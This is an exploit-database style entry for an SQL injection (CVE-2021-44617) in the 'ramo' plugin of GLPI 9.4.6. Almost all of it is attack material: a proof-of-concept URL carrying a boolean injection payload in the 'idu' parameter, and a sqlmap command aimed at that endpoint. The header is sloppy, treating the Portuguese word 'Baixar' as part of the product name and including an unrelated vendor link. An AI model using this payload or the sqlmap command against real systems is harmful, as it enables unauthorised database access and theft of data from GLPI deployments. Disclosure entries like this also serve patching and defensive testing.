Baixar GLPI Project 9.4.6 suffers from a remote SQL injection vulnerability.
26ad8734c5ba0d90f45a96375b55ccde
# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Date: 10/12
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617
#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111
sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"